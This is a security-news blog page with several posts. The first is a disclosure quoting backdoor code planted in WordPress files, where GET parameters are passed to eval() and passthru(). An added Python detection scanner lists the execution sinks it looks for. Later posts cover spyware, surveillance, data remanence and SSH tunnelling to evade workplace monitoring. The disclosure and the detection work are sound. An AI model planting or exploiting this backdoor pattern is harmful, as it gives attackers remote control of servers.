Discussions on computers and beyond

Welcome to Topsight.net
Tuesday, September 07 2010 @ 04:49 AM EDT

WordPress source code compromised to enable remote code execution

According to Ivan Fratric of http://ifsec.blogspot.com/:

While assessing the security of WordPress, a popular blog creation software, I have discovered that its source code has recently been compromised by a third party in order to enable remote command execution on the machines running affected versions. The compromised files are wp-includes/feed.php and wp-includes/theme.php.
The following code has been added:

in wp-includes/feed.php

function comment_text_phpfilter($filterdata) {
eval($filterdata);
}
...
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }


in wp-includes/theme.php

function get_theme_mcommand($mcds) {
passthru($mcds);
}
...
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
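
A detection sketch for the pattern quoted above, added here as an example (it is not from Ivan Fratric's post or from WordPress). It flags request data that reaches a code or command execution sink, either directly or through a thin wrapper function as in the two files. The name scan_php, the SAMPLES dictionary and every sink beyond eval and passthru are assumptions of this example, and regex matching is a heuristic rather than a PHP parser.

```python
import re

# eval and passthru are the sinks on the page; the rest are an added generalization.
SINKS = r"(?:eval|passthru|system|exec|shell_exec|popen|proc_open)"
REQUEST = r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\["
# Thin wrapper: function name($p) { ... sink($p) ... }
WRAPPER = re.compile(
    r"function\s+(\w+)\s*\(\s*(\$\w+)\s*\)\s*\{[^}]*?\b(%s)\s*\(\s*\2\s*\)" % SINKS,
    re.S)
# Direct use: sink($_GET[...])
DIRECT = re.compile(r"\b(%s)\s*\(\s*%s" % (SINKS, REQUEST))

def scan_php(source):
    """Return sorted (line, description) pairs for request data reaching a sink."""
    line_of = lambda pos: source.count("\n", 0, pos) + 1
    findings = [(line_of(m.start()), "request data -> %s()" % m.group(1))
                for m in DIRECT.finditer(source)]
    for w in WRAPPER.finditer(source):
        name, sink = w.group(1), w.group(3)
        # Look for calls that hand a request superglobal to the wrapper.
        call = re.compile(r"\b%s\s*\(\s*%s" % (re.escape(name), REQUEST))
        findings += [(line_of(m.start()), "request data -> %s() -> %s()" % (name, sink))
                     for m in call.finditer(source)]
    return sorted(findings)

# The two additions quoted on the page, plus one constructed clean file.
SAMPLES = {
    "wp-includes/feed.php": '''<?php
function comment_text_phpfilter($filterdata) {
eval($filterdata);
}
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
''',
    "wp-includes/theme.php": '''<?php
function get_theme_mcommand($mcds) {
passthru($mcds);
}
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
''',
    "clean.php (constructed)": '''<?php
function show_title($t) { return htmlspecialchars($t); }
echo show_title($_GET["title"]);
''',
}

if __name__ == "__main__":
    for path, src in SAMPLES.items():
        for line, what in scan_php(src):
            print("%s:%d: %s" % (path, line, what))
```

Comparing installed files against checksums of a known-good release remains the stronger check; a pattern scan like this only catches additions shaped like the ones quoted.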

More AIM spyware and adware.

Not to beat a dead horse, but check this out. Today internetnews.com’s Ryan Naraine reported on the addition of new software in the next version of AIM. According to Naraine, AOL has made a deal with WeatherBug to include the WeatherBug software in the next version of AIM. What this means is that not only will AIM be including the spyware-ridden WildTangent, but now the adware-ridden WeatherBug will also be included.

Spyware Scanner Review

FlexBeta.Net reviewed two spyware removal tools, one named Ad-Aware and the other named Spybot - Search and Destroy.

Their test setup was a Windows 2000 Professional installation running inside the VMware virtual machine software, with 28 programs known to contain spyware and adware installed. Check out how bad their Internet Explorer and their desktop looked!

Re: The Soft Underbelly: Attacking the Client

Tom Vogt has made a great point with his latest article on SecurityFocus. In his article Tom articulates his points in this summary:

The vast majority of corporate networks rely on perimeter defence as their primary security feature. Once inside, an attacker seldom has trouble taking over as much of the network as he likes.

Insecure client machines are primary targets, and can not adequately be protected by border firewalls, a mail server's anti virus software or physical walls alone, and client machines are almost always granted higher access levels than they strictly require. The security of any given system is always that of the weakest link.

The technology exists to mitigate these risks but it is complex, seldom-used and impacts the "user experience". In other words, it makes it harder to work with the computer systems. Hardening each client is a non-trivial task, and the administration of secure operating systems with features such as RBAC or MAC requires skills that too few administrators have. The walls around our cities are high and strong. Inside, we are still building wooden huts.

London's eye in the sky looking at the road?

Today, Gary O’Shea and Nic Cecil of Online Sun reported that the London infomin (Newspeak for information ministry) plans to have all new motor vehicles fitted with a tracking/monitoring device that would pinpoint and monitor every vehicle on the road. According to the authors, this new monitoring device would record and report every time the driver of the motor vehicle drifted over the speed limit, wandered into a bus lane, or stopped on a yellow line. The authors believe that this new system would essentially install a computerized spy in each car.

Data miners - garbage pickers of the new millennium

A college professor once told me, “Don’t leave old hard drives or disks out in the trash; data miners pay a lot of money for information that’s left dormant on these drives”. Apparently what this professor said couldn’t have been truer. According to Justin Pope of sfgate.com, Simson Garfinkel and Abhi Shelat of MIT purchased 159 used hard drives, and they were able to harvest personal information from 49 of them. Using rough numbers, it’s plain to see that of the supposed 150,000 retired hard drives of the past year, a third contain personal information that can be used by everyone from thieves and identity thieves to shady marketing companies like DoubleClick. The point I’m trying to make is that if the general public practiced safe and secure computing habits, these problems wouldn’t exist. If the drives had been overwritten by one of the more than 40 programs available, the information that was once contained on these drives would no longer exist. In fact, older versions of a tool included in Norton Utilities called “Speed Disk” had an option to overwrite a hard drive after defragmenting. What a novel concept.

Monitoring To Become Normality

An article written by Mark Berniker for internetnews.com provides some scary insight into President Bush’s new plan to make internet service providers monitor and track their own users. Berniker states, “Experts say the Bush administration wants to create an "early warning center," which would give it the power to monitor any aspect of Internet use in the U.S.” He goes on to explain that it’s not known what exactly ISPs will be responsible for.

Thwarting corporate monitoring software

Excerpt of a Wired.com news story titled "IM Users: Your Boss Is Watching": "Instant messaging -- a tool many perceive as off-limits to the prying eyes of employers -- may soon be going the way of e-mail.

In the interests of record-keeping and tighter security, industry analysts say a growing number of companies that allow instant messaging in the office are also monitoring its usage."

It seems like the only way to ensure that your personal communications are secure at work, when they are monitoring all kinds of stuff, is to leave your home computer on, acting as an SSH server; boot a CD-based distribution of Linux such as Knoppix at the place you work (or wherever you feel generally insecure communicating); ssh into your home computer from there; and then tunnel all your traffic over that connection. (Tunneling your web browsing can be done by running a SOCKS or web proxy on your home machine that only accepts connections from localhost, then mapping a local port via ssh so that it is tunneled over the SSH connection to the port of the proxy on your home machine, and finally setting your web browser's proxy settings to the local port you mapped over the SSH session.) That way your communications would be fully encrypted (at least as far as your home computer), and the boss or whoever is doing the monitoring wouldn't be able to snoop on what's being sent and received.

Then again, if you have something to say that you don't want your boss to see it is probably easier/best to just not say it at work at all.

Links:
A related story: TechTV: Message to Employees: Expect No Privacy
Anonymizer - Online Privacy and Security

More information on SSH:
SSH Features
SSH port forwarding features
Tunneling VNC over SSH (What is VNC?)